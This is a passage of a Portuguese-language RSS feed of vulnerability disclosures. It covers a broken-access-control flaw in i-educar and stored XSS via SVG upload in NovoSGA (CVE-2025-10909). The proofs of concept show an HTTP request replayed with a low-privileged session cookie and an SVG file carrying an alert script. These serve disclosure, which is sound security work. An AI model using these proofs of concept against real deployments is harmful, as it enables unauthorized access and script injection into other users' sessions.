&amp;lt;code&amp;gt;/consulta-dispensas&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11048&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11048&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/consulta-dispensas&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /consulta-dispensas&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autenticar como um usuário sem privilégios.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11048/image.png&amp;#34;
	width=&amp;#34;1603&amp;#34;
	height=&amp;#34;673&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11048/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11048/image_hu_7e1e16197ca84d77.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;571px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11048/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11048/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11048/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Enviar a seguinte requisição:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /consulta-dispensas HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low_privileged cookie]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Podemos observar que temos acesso à página e à função. E esse usuário não deve fazer isso.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11048/image-2.png&amp;#34;
	width=&amp;#34;960&amp;#34;
	height=&amp;#34;816&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11048/image-2_hu_c031b0a968dc8a1c.png 480w, /p/cve-2025-11048/image-2_hu_d30391eb81b5ae23.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;117&amp;#34;
		data-flex-basis=&amp;#34;282px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 26 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10909</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10909/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10909/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10909-múltiplas-injeções-de-cross-site-scripting-xss-armazenado-por-upload-de-arquivo-svg&amp;#34;&amp;gt;CVE-2025-10909: Múltiplas Injeções de Cross-Site Scripting (XSS) armazenado por Upload de Arquivo SVG
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10909&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10909&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Múltiplas vulnerabilidades de Cross-Site Scripting (XSS) armazenado via desvio de upload de arquivo SVG foi identificada no endpoint &amp;lt;code&amp;gt;/admin&amp;lt;/code&amp;gt; do aplicativo NovoSGA. Essa vulnerabilidade permite que invasores enviem arquivos maliciosos para os parâmetros &amp;lt;code&amp;gt;logoNavbar&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;logoLogin&amp;lt;/code&amp;gt;. Os arquivos injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada por usuários, representando um risco significativo à segurança.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10909-múltiplas-injeções-de-cross-site-scripting-xss-armazenado-por-upload-de-arquivo-svg&amp;#34;&amp;gt;CVE-2025-10909: Múltiplas Injeções de Cross-Site Scripting (XSS) armazenado por Upload de Arquivo SVG
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10909&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10909&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Múltiplas vulnerabilidades de Cross-Site Scripting (XSS) armazenado via desvio de upload de arquivo SVG foi identificada no endpoint &amp;lt;code&amp;gt;/admin&amp;lt;/code&amp;gt; do aplicativo NovoSGA. Essa vulnerabilidade permite que invasores enviem arquivos maliciosos para os parâmetros &amp;lt;code&amp;gt;logoNavbar&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;logoLogin&amp;lt;/code&amp;gt;. Os arquivos injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada por usuários, representando um risco significativo à segurança.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/admin&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;logoNavbar&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;logoLogin&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;logoNavbar&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;logoLogin&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p align=&amp;#34;justify&amp;#34;&amp;gt;Salve o payload no arquivo &amp;lt;code&amp;gt;xss.svg&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;xmlns&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;http:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;//&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;www&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;w3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;org&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;2000&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;fill&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;none&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;This&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;is&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;an&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;POC&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;from&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;CVEHUNTERS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10909/image-1.png&amp;#34;
	width=&amp;#34;547&amp;#34;
	height=&amp;#34;248&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10909/image-1_hu_5e49e8aee02acf5b.png 480w, /p/cve-2025-10909/image-1_hu_26dd0b39f6a28a56.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;220&amp;#34;
		data-flex-basis=&amp;#34;529px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10909/image.png&amp;#34;
	width=&amp;#34;565&amp;#34;
	height=&amp;#34;262&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10909/image_hu_b57344f147506082.png 480w, /p/cve-2025-10909/image_hu_5d0c054a6a8a9ef0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;215&amp;#34;
		data-flex-basis=&amp;#34;517px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/NovoSGA/CVE-2025-10909.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/NovoSGA/CVE-2025-10909.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
